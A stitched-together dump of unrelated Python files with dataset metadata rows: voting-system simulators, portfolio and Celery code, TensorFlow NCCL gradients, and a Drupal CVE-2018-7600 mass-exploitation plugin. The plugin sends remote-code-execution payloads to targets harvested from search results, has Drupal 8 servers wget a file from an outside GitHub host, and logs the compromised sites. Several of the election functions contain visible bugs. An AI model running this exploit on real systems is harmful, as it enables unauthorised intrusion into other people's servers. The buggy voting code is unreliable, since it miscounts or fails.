# Count votes for the first round
counts = {c: 0 for c in candidates}
total_votes = 0
for ballot, votes in ballots:
candidate = ballot[0]
counts[candidate] += votes
# Check if a majority was reached
majority_reached = False
for candidate, votes in counts:
if votes > 0.5 * total_votes:
majority_reached = True
break
# If there's no majority, move on to the second round
if not majority_reached:
# Keep only the top two candidates from the previous round
a, b = [c for c, v in sort_dict_desc(counts)[0:2]]
# Make each voter group choose the one they prefer
ballots = self.generate_block_ballots(1, [a, b], randomize)
# Reset and count votes for the finalists
counts = {a: 0, b: 0}
for ballot, votes in ballots:
candidate = ballot[0]
counts[candidate] += votes
# The winner is the candidate with the majority in the end
winner = sort_dict_desc(counts)[0][0]
# Prepare result
name = 'Two-round system (TRS)'
details = [f'{len(candidates)} initial candidates']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, [winner], details=details)
return result
def simulate_stv(self, seats, candidates, droop_quota=True,
surplus_transfers=True, randomize=False):
"""Simulates single transferable vote.
STV is a ranked voting system that approximates proportional
representation in multiple seat elections. Each voter ranks the
candidates in order of preference (perhaps with a maximum number of
rankings). The vote goes to the voter's first preference if possible,
but if their first preference is eliminated, instead of being thrown
away, the vote is transferred to their next available preference.
The counting process works thus: votes are totalled, and a quota (the
minimum number of votes required to win a seat) is derived. If the
voter's first-ranked candidate achieves the quota, the candidate is
declared elected; and, in some STV systems, any surplus vote is
transferred to other candidates in proportion to the next back-up
preference marked on the ballots. If more candidates than seats remain,
the candidate with the fewest votes is eliminated, with the votes in
their favour being transferred to other candidates as determined by the
voters' next back-up preference. These elections and eliminations, and
vote transfers if applicable, continue until enough candidates exceed
quota to fill all the seats or until there are only as many remaining
candidates as there are unfilled seats, at which point the remaining
candidates are declared elected.
Alternatively, there's a simpler method that uses only elimination
transfers: sequentially identify the candidate with the least support,
eliminate that candidate, and transfer those votes to the next-named
candidate on each ballot. This process is repeated until there are
only as many candidates left as seats available.
This function implements the STV process with and without quotas, and
with or without surplus transfers. The number of ranks of every ballot
is set to be the maximum between 5 and 1.5 times the number of seats
to be filled, but never exceeding the number of available candidates.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
droop_quota: Use the Droop quota or not.
surplus_transfers: Transfer surplus votes or not.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Ballot size
n = min(max(round(1.5 * seats), 5), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Count first choices
counts = {c: 0 for c in candidates}
total_votes = 0
for ranking, votes in ballots:
first_choice = ranking[0]
counts[first_choice] += votes
total_votes += votes
# Calculate quota if required
quota = None
if droop_quota:
quota = m.floor(total_votes / (seats + 1)) + 1
# Count and transfer votes until all seats are filled
winners = []
while len(winners) < seats:
# Get remaining candidates
remaining = [(c, v) for c, v in sort_dict_desc(counts)
if c not in winners and v > 0]
# If there are two remaining candidates in a single-seat election,
# mark winner and end process right away, to have more than one
# candidate in the vote counts table
if seats == 1 and len(remaining) == 2:
winner = remaining[0][0]
winners.append(winner)
break
# If the number of remaining candidates is equal to
# the number of seats, fill seats and stop the process
if len(remaining) == seats:
for candidate, votes in remaining:
winners.append(candidate)
break
# Check if any remaining candidate reached the quota (if any)
reached_quota = False
if droop_quota:
for candidate, votes in remaining:
if votes >= quota:
reached_quota = True
# Candidate is elected
winners.append(candidate)
# Remove candidate from the ballots
for r, v in ballots:
r.remove(candidate)
# Remove surplus votes from candidate's vote count
surplus = votes - quota
counts[candidate] -= surplus
# If required, transfer surplus votes
if surplus_transfers and surplus > 0:
# Find the next choice candidate in all ballots
# that have this candidate as first choice
next_choices = {}
for r, v in ballots:
if r[0] == candidate:
next_choice = r[1]
next_choices[next_choice] = (
next_choices.get(next_choice, 0) + v)
# Distribute surplus evenly among next choices
ratio = surplus / votes
for c, v in next_choices:
new_votes = v * ratio
counts[c] += m.floor(new_votes)
surplus -= new_votes
# If no candidate reached the quota (or not using it)
if not reached_quota:
# Eliminate the least favored candidate (LFC)
lfc = remaining[-1][0]
counts[lfc] = 0
# Find the next choice candidate of each voter group that
# supported the LFC and remove the LFC from each ranking
next_choices = {}
for r, v in ballots:
if r[0] == lfc:
next_choice = r[1]
next_choices[next_choice] = (
next_choices.get(next_choice, 0) + v)
r.remove(lfc)
# Distribute LFC votes among next choices
for c, v in next_choices:
counts[c] += v
# Remove candidate from the ballots
for r, v in ballots:
r.remove(candidate)
# Prepare result
name = 'Single transferable vote (STV)'
details = [f'({seats} seats',
f'{len(candidates)} candidates',
f'{n} ranks per ballot']
if randomize:
details.append('Randomized ballot generation')
if droop_quota:
method = 'Using Droop quota'
if surplus_transfers:
method += ' with surplus transfers'
else:
method += ' without surplus transfers'
details.append(method)
else:
details.append('Elimination transfers only')
result = ElectionResult(name, counts, winners, details=details)
return result
def simulate_irv(self, candidates, randomize=False):
"""Simulates instant-runoff voting.
IRV is a ranked voting system for single seat elections. Each
voter ranks the candidates in order of preference (perhaps with a
maximum number of rankings). Ballots are initially counted for each
voter's top choice. If a candidate has more than half of the vote
based on first-choices, that candidate wins. If not, then the
candidate with the fewest votes is eliminated. The voters who
selected the defeated candidate as a first choice then have their
votes added to the totals of their next choice. This process
continues until a candidate has more than half of the votes. When
the field is reduced to two, it has become an "instant runoff" that
allows a comparison of the top two candidates head-to-head.
It's equivalent to a single-seat STV using the eliminations-only
method, and this function implements it that way.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat, eliminations-only STV
result = self.simulate_stv(1, candidates, droop_quota=False,
randomize=randomize)
# Change name
result.voting_system = 'Instant-runoff voting (IRV)'
# Remove number of seats line
del result.details[0]
# Remove method line
del result.details[-1]
return result
def simulate_copeland(self, candidates, randomize=False):
"""Simulates Copeland's method voting.
Copeland's method is a Smith-efficient Condorcet method for single
seat elections. Voters rank the candidates in order of preference in
their ballots, and then candidates are ordered by the number of
pairwise victories, minus the number of pairwise defeats, according
to those ballots.
When there is no Condorcet winner, this method often leads to ties.
For example, if there is a three-candidate majority rule cycle, each
candidate will have exactly one loss, and there will be an unresolved
tie between the three.
In this implementation, the number of ranks of every ballot is set to
be a random number between 5 and 10, but never exceeding the number
of available candidates.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# List all ranked candidates
ranked_candidates = []
for ranking, votes in ballots:
for candidate in ranking:
if candidate not in ranked_candidates:
ranked_candidates.append(candidate)
# Generate pairwise matchings
matchings = list(itls.combinations(ranked_candidates, 2))
# Get results of each pairwise matching
won = {c: 0 for c in ranked_candidates}
lost = {c: 0 for c in ranked_candidates}
for a, b in matchings:
votes = {a: 0, b: 0}
# Loop through each ballot
for ranking, votes in ballots:
# Check which candidate is preferred and increase its
# vote count. Ties are impossible.
if ranking.index(a) < ranking.index(b):
votes[a] += votes
else:
votes[b] += votes
# Update win/loss counts
if votes[a] > votes[b]:
won[a] += 1
lost[b] += 1
elif votes[a] < votes[b]:
won[b] += 1
lost[a] += 1
# The winner is the candidate with the highest win-loss score
win_loss = {c: won[c] - lost[c] for c in ranked_candidates}
winner = sort_dict_desc(win_loss)[0][0]
# Prepare result
name = 'Copeland\'s method'
details = [f'{len(candidates)} candidates',
f'{n} ranks per ballot']
result = ElectionResult(name, win_loss, [winner], count_type='Win-loss',
percent_column=False, details=details)
return result
def simulate_borda_count(self, candidates, variant='standard',
randomize=False):
"""Simulates Borda count voting.
The Borda count is a family of ranked voting systems for single seat
elections. Each voter ranks the candidates by order of preference and,
for each ballot, the candidates are given points according to their
rank position.
In the standard Borda count, if there are n candidates, the first
rank awards n points, the second n-1 points, and so on. A "zero-index"
version of the same scheme can be created by starting at n-1 points
for the first candidate. There's also a variant called Dowdall system,
where the first rank awards 1 point, the second 1/2 point, the third
1/3, and so on, making the scores independent from the number of
candidates.
This function implements all three variants: standard Borda count,
zero-index variant, and Dowdall system. The number of ranks of every
ballot is set to be a random number between 5 and 10, but never
exceeding the number of available candidates.
Args:
candidates: List of candidates.
variant: Variant of Borda count to use. Choices are 'standard',
'zero-index', or 'dowdall'.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Score the candidates in each ballot
scores = {c: 0 for c in candidates}
for ranking, votes in ballots:
for i, candidate in enumerate(ranking):
# Score must be multiplied by the amount of votes
score = votes
if variant == 'dowdall':
# Dowdal system: Score declines harmonically
# according to sequence position
score *= (1.0 / (i + 1))
else:
# Standard/zero-index: Score declines arithmetically
# according to sequence position
score *= n - i - 1 if variant == 'zero-index' else n - i
scores[candidate] += round(score)
# The winner is the candidate with the highest score
winner = sort_dict_desc(scores)[0][0]
# Prepare result
name = 'Borda count'
details = []
if variant == 'dowdall':
details.append('Dowdall system')
elif variant == 'zero_index':
details.append('Zero-index variant')
details.extend([f'{len(candidates)} candidates',
f'{n} ranks per ballot'])
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, scores, [winner], count_type='Score',
details=details)
return result
def simulate_bucklin_voting(self, candidates, randomize=False):
"""Simulates Bucklin voting.
Bucklin voting is a family of ranked voting systems for single seat
elections. In the standard process, each voter ranks the candidates
by order of preference and first choice votes are counted. If a
candidate has a majority, that candidate wins. Otherwise, second
choices are added to the first choices. If a candidate has a majority,
that candidate wins, or the process continues until a majority is
reached.
This function implements the standard Bucklin voting procedure. The
number of ranks of every ballot is set to be a random number between
5 and 10, but never exceeding the number of available candidates.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Count the votes on each round
total_votes = sum([v for r, v in ballots])
counts = {c: 0 for c in candidates}
while True:
# Loop through ballots
for ranking, votes in ballots:
# If there are no candidates left in the ranking, move on
if not ranking:
continue
# Add votes to remaining first choice
candidate = ranking[0]
counts[candidate] += votes
# Remove this choice from the ranking
del ranking[0]
# Check if a majority was reached
majority_reached = False
for candidate, votes in counts:
if votes > 0.5 * total_votes:
majority_reached = True
break
# If so, end the process
if majority_reached:
break
# The winner is the candidate with the most votes
winner = sort_dict_desc(counts)[0][0]
# Prepare result
name = 'Bucklin voting'
details = [f'{len(candidates)} candidates',
f'{n} ranks per ballot']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, [winner], details=details)
return result
def simulate_score_voting(self, candidates, min_score, max_score,
randomize=False):
"""Simulates score voting or range voting.
Score voting is a family of cardinal voting systems for single seat
elections. In the standard process, each voter gives each candidate a
score, the scores are then summed, and the winner is the one with the
highest total score.
In this implementation, the number of ranks of every ballot is set to
be a random number between 5 and 10, but never exceeding the number
of available candidates.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
min_score: Minimum score of the range
max_score: Maximum score of the range
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
InvalidScoreRangeError: If the given minimum score is greater
than the maximum
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
if min_score > max_score:
raise InvalidScoreRangeError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate score ballots
ballots = self.generate_score_ballots(
n, candidates, min_score, max_score, randomize)
# Count the scores for each candidate
scores = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate, score in ballot.items():
scores[candidate] += votes * score
# The winner is the candidate with the highest score
winner = sort_dict_desc(scores)[0][0]
# Prepare result
name = 'Score voting'
details = [f'Score range [{min_score}, {max_score}]',
f'{len(candidates)} candidates',
f'{n} ranks per ballot',
'Randomized selection']
result = ElectionResult(name, scores, [winner], count_type='Score',
percent_column=False, details=details)
return result
def simulate_cav(self, candidates, randomize=False):
"""Simulates combined approval voting or evaluative voting.
CAV is a type of score voting system for single seat elections,
where each voter may express approval (1), disapproval (0), or
indifference (-1) toward each candidate, then the scores are summed
and the winner is the most-approved candidate (highest score).
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: score voting with score range [-1, 1]
result = self.simulate_score_voting(
candidates, -1, 1, randomize=randomize)
# Change name
result.voting_system = 'Combined approval voting (CAV)'
# Change score range line
result.details[0] = 'Scores used: support (1), neutral (0), oppose (-1)'
return result
def simulate_approval_voting(self, candidates, randomize=False):
"""Simulates approval voting.
Approval voting is a type of score voting system for single seat
elections, where each voter may approve (1) or not (0) any number of
candidates, and the winner is the most-approved candidate.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: score voting with score range [0, 1]
result = self.simulate_score_voting(
candidates, 0, 1, randomize=randomize)
# Change name
result.voting_system = 'Approval voting'
# Change results count type
result.count_type = 'Approvals'
# Change score range line
result.details[0] = 'Each approval counts as one point'
return result
def simulate_star_bloc_voting(self, seats, candidates, randomize=False):
"""Simulates score-then-automatic-runoff (STAR) bloc voting.
START bloc voting is an adaptation of the STAR voting system for
multiple seat elections. Each voter scores all the candidates on
a scale from 0 to 5. All the scores are added and the two highest
scoring candidates advance to an automatic runoff. The finalist who
was preferred by (scored higher by) more voters wins the first seat.
The next two highest scoring candidates then runoff, with the finalist
preferred by more voters winning the next seat. This process continues
until all positions are filled.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
seats: Number of seats to be filled
candidates: List of candidates
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Ballot size
n = min(rd.randint(5, 10), len(candidates))
# Generate score ballots
ballots = self.generate_score_ballots(n, candidates, 0, 5, randomize)
# Count the scores for each candidate
scores = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate, score in ballot:
scores[candidate] += votes * score
# Fill the seats
winners = []
while len(winners) < seats:
# Get remaining candidates
remaining = [(c, v) for c, v in sort_dict_desc(scores)
if c not in winners and v > 0]
# If the number of remaining candidates is equal to
# the number of seats, fill seats and stop the process
if len(remaining) == seats:
for candidate, votes in remaining:
winners.append(candidate)
break
# Automatic runoff with the two two candidates
a, b = [c for c, v in remaining[0:2]]
runoff = {a: 0, b: 0}
for ballot, votes in ballots:
# Get highest score of each candidate
max_a = max([s for c, s in ballot if c == a])
max_b = max([s for c, s in ballot if c == b])
# Compare highest scores
if max_a < max_b:
# Prefers candidate B
runoff[b] += votes
elif max_a > max_b:
# Prefers candidate B
runoff[a] += votes
# The candidate with the highest runoff score wins a seat
winner = sort_dict_desc(runoff)[0][0]
winners.append(winner)
# Prepare result
name = 'Score-then-automatic-runoff (STAR) bloc voting'
details = [f'{seats} seats',
f'{len(candidates)} candidates',
f'{n} ranks per ballot',
'Randomized selection']
result = ElectionResult(name, scores, winners, count_type='Score',
details=details)
return result
def simulate_star_voting(self, candidates, randomize=False):
"""Simulates score-then-automatic-runoff (STAR) voting.
START voting is a voting system for single seat elections that consists
of score voting and a virtual runoff. Each voter scores all the
candidates on a scale from 0 to 5. All the scores are added and the two
highest scoring candidates advance to an automatic runoff. The finalist
who was preferred by (scored higher by) more voters wins.
This function has zero guarantee of reproducibility, since the
scoring process is completely randomized for all but the highest- and
lowest-ranked candidates on each ballot.
Args:
candidates: List of candidates
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat STAR bloc voting
result = self.simulate_star_bloc_voting(
1, candidates, randomize=randomize)
# Change name
result.voting_system = 'Score-then-automatic-runoff (STAR) voting'
# Remove number of seats line
del result.details[0]
return result
class NoSeatsToFillError(Exception):
pass
class NotEnoughCandidatesError(Exception):
pass
class InvalidScoreRangeError(Exception):
pass
| 0 | 50,550 | 92 |
e5ad78c5dfb9a7cf808d457ea96e8cdd1767fd83 | 7,073 | py | Python | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 155 | 2016-09-11T00:43:07.000Z | 2018-05-02T06:36:43.000Z | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 19 | 2016-09-12T14:39:17.000Z | 2018-04-24T00:47:01.000Z | plugins/drupalgeddonrce2.py | fakegit/google_explorer | 0b21b57ef6fb7b9182fb13d00508164d007b2d19 | [
"MIT"
] | 85 | 2016-09-10T20:01:48.000Z | 2018-05-16T15:01:28.000Z | from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
import re
import os
from requests import get
from requests import post
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lock = threading.Lock()
if __name__ == '__main__':
main()
| 46.228758 | 139 | 0.405203 | from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
import re
import os
from requests import get
from requests import post
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lock = threading.Lock()
class Drupal_CVE_2018_7600():
def __init__(self, filename):
self.filename = filename
self.urls = self.dp_cve()
@staticmethod
def banner():
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" Drupal(7/8) CVE 2018 7600 Checker - anarcoder at protonmail.com\n")
def remove_duplicate_targets(self):
results = [line.rstrip('\n') for line in open(self.filename)]
url_lists = []
for url in results:
try:
urlp = urlparse(url)
urlp = urlp.scheme + '://' + urlp.netloc
url_lists.append(urlp)
except Exception as e:
pass
url_lists = set(url_lists)
url_lists = list(url_lists)
return url_lists
def check_vuln(self, q):
while True:
#with lock:
url = q.get()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; '
'Linux x86_64; rv:41.0) Gecko/20100101 '
'Firefox/41.0'}
drupal8conf = {'getParams': '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax',
'payload': {'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': 'wget https://raw.githubusercontent.com/devel369/php/master/hu3.html'},
'webshell': {'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': 'wget https://raw.githubusercontent.com/devel369/php/master/hu3.html'}}
drupal7conf = {'getParams': {'q': 'user/password',
'name[#post_render][]': 'passthru',
'name[#markup]': 'id',
'name[#type]': 'markup'},
'postParams': {'form_id': 'user_pass',
'_triggering_element_name': 'name'}}
vulnFlag = 0
with open('drupalrce_sites.txt', 'a+') as f:
try:
print('[+] Trying rce for drupal 8.. {0}'.format(url))
req = post(url + drupal8conf['getParams'],
headers=headers, verify=False,
timeout=30, data=drupal8conf['payload'])
if req.status_code == 200:
print('[+] Post accepted, confirming page uploaded..')
req = get(url + '/hu3.html', headers=headers,
verify=False, timeout=30)
if 'It Works' in req.content.decode("utf-8"):
print('[+] \033[31mVulnerable!!\033[33m Drupal 8 -> {0}\033[39m'.format(url + '/hu3.html'))
print('[+] Uploading webshell uploader...')
req = post(url + drupal8conf['getParams'],
headers=headers, verify=False,
timeout=30,
data=drupal8conf['webshell'])
f.write(url + '/hu3.php' + '\n')
vulnFlag = 1
else:
print('[-] Not vulnerable for drupal 8..')
if vulnFlag == 0:
print('[+] Trying rce for drupal 7.. {0}'.format(url))
req = post(url, params=drupal7conf['getParams'],
data=drupal7conf['postParams'],
verify=False, timeout=30)
m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', req.text)
if m:
found = m.group(1)
get_params = {'q':'file/ajax/name/#value/' + found}
post_params = {'form_build_id': found}
req = post(url, data=post_params,
params=get_params, verify=False,
timeout=30)
if "uid=" in req.content.decode("utf-8"):
print('[+] \033[31mVulnerable!!\033[33m Drupal 7 {0}\033[39m'.format(url))
print('[+] \033[31m{0} {1}\033[39m'.format(str(req.content.decode("utf-8")).split('\n')[0],url))
f.write(url + ' -> Drupal 7 \n')
q.task_done()
except Exception as e:
print('[-] Exception - Not vulnerable\n')
q.task_done()
q.task_done()
def dp_cve(self):
self.banner()
# Removing duplicate targets
url_lists = self.remove_duplicate_targets()
print(len(url_lists))
# My Queue
q = Queue(maxsize=0)
# Number of threads
num_threads = 10
for url in url_lists:
q.put(url)
# My threads
print('[*] Starting evil threads =)...\n')
for i in range(num_threads):
worker = Thread(target=self.check_vuln, args=(q,))
worker.setDaemon(True)
worker.start()
q.join()
def main():
filename = 'results_google_search.txt'
Drupal_CVE_2018_7600(filename)
if __name__ == '__main__':
main()
| 7,243 | 161 | 46 |
37b0f78d2a093d2a9f348fbb7a08d7fc6097a6ad | 636 | py | Python | portfoliofinder/contributions/scheduled_contributions.py | asteffey/portfolio-finder | a0001975ce28d2b92552810f18715c1351fd1422 | [
"MIT"
] | null | null | null | portfoliofinder/contributions/scheduled_contributions.py | asteffey/portfolio-finder | a0001975ce28d2b92552810f18715c1351fd1422 | [
"MIT"
] | 9 | 2018-12-18T00:15:41.000Z | 2020-06-20T17:12:04.000Z | portfoliofinder/contributions/scheduled_contributions.py | apsteffey/portfolio-finder | fbb596a8bc908f20826d9592c94db3fc553b378b | [
"MIT"
] | 1 | 2020-10-20T08:40:57.000Z | 2020-10-20T08:40:57.000Z | from typing import Dict
from .contributions import Contributions
class ScheduledContributions(Contributions): # pylint: disable=too-few-public-methods
"""Contributions which occur at specific years in the life of the portfolio.
:param scheduled_contributions: contributions by year relative to inception of portfolio
"""
| 35.333333 | 92 | 0.756289 | from typing import Dict
from .contributions import Contributions
class ScheduledContributions(Contributions): # pylint: disable=too-few-public-methods
"""Contributions which occur at specific years in the life of the portfolio.
:param scheduled_contributions: contributions by year relative to inception of portfolio
"""
def __init__(self, scheduled_contributions: Dict[int, float]):
self.scheduled_contributions = scheduled_contributions
def get_contribution_for_year(self, year):
if year in self.scheduled_contributions:
return self.scheduled_contributions[year]
return 0
| 245 | 0 | 53 |
c11715dba5441ac66af6f1c555d1d86364de8536 | 939 | py | Python | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | null | null | null | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | 32 | 2016-05-09T19:37:08.000Z | 2022-01-13T01:00:52.000Z | src/sgk/celeryapp.py | mava-ar/sgk | cb8b3abf243b4614e6a45e4e2db5bb7cce94dee4 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
import os
from tenant_schemas_celery.app import CeleryApp
from django.conf import settings
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
if os.path.isfile(os.path.join(os.path.abspath('.'), 'sgk', 'settings', 'local.py')):
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.local')
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.production')
app = CeleryApp('sgk')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# schedule for all environment
app.conf.beat_schedule = {
# 'send_sms_notifications': {
# 'task': 'send_sms_notifications',
# 'schedule': crontab(minute='0', hour='08') # Execute every day at 8:00 am
# },
}
| 32.37931 | 85 | 0.741214 | from __future__ import absolute_import
import os
from tenant_schemas_celery.app import CeleryApp
from django.conf import settings
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
if os.path.isfile(os.path.join(os.path.abspath('.'), 'sgk', 'settings', 'local.py')):
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.local')
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sgk.settings.production')
app = CeleryApp('sgk')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# schedule for all environment
app.conf.beat_schedule = {
# 'send_sms_notifications': {
# 'task': 'send_sms_notifications',
# 'schedule': crontab(minute='0', hour='08') # Execute every day at 8:00 am
# },
}
| 0 | 0 | 0 |
f9018d542882a2b4348b7736cc1deaa344619663 | 9,971 | py | Python | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 38 | 2021-12-01T06:54:36.000Z | 2022-03-23T11:23:21.000Z | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 15 | 2021-12-01T09:15:26.000Z | 2022-03-28T02:49:21.000Z | hybridbackend/tensorflow/distribute/nccl.py | fuhailin/HybridBackend | 113383c5870b7180fa67c194208a27f76bdbf3f0 | [
"Apache-2.0"
] | 8 | 2021-12-02T01:16:14.000Z | 2022-01-28T04:51:16.000Z | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''NCCL based collective commmunication.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from hybridbackend.tensorflow.distribute.communicator import CollectiveOps
from hybridbackend.tensorflow.distribute.communicator import Communicator
from hybridbackend.tensorflow.distribute.pubsub import PubSub
from hybridbackend.tensorflow.pywrap import _ops
ops.NotDifferentiable('GetNcclId')
ops.NotDifferentiable('NcclComm')
ops.NotDifferentiable('CreateNcclComm')
ops.NotDifferentiable('IsNcclCommInitialized')
@ops.RegisterGradient('ReduceWithNcclComm')
def _reduce_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL reduce op.
'''
comm = op.inputs[0]
grad_in = args[0]
reduce_op = op.get_attr('reduce_op')
root_rank = op.get_attr('root_rank')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.broadcast_with_nccl_comm(
comm, grad_in, root_rank=root_rank)
return None, grad_out
@ops.RegisterGradient('ReduceScatterWithNcclComm')
def _reduce_scatter_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL reduce scatter op.
'''
comm = op.inputs[0]
grad_in = args[0]
reduce_op = op.get_attr('reduce_op')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.allgather_with_nccl_comm(comm, grad_in)
return None, grad_out
@ops.RegisterGradient('AllreduceWithNcclComm')
def _allreduce_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL allreduce op.
'''
comm = op.inputs[0]
grad_in = args[0]
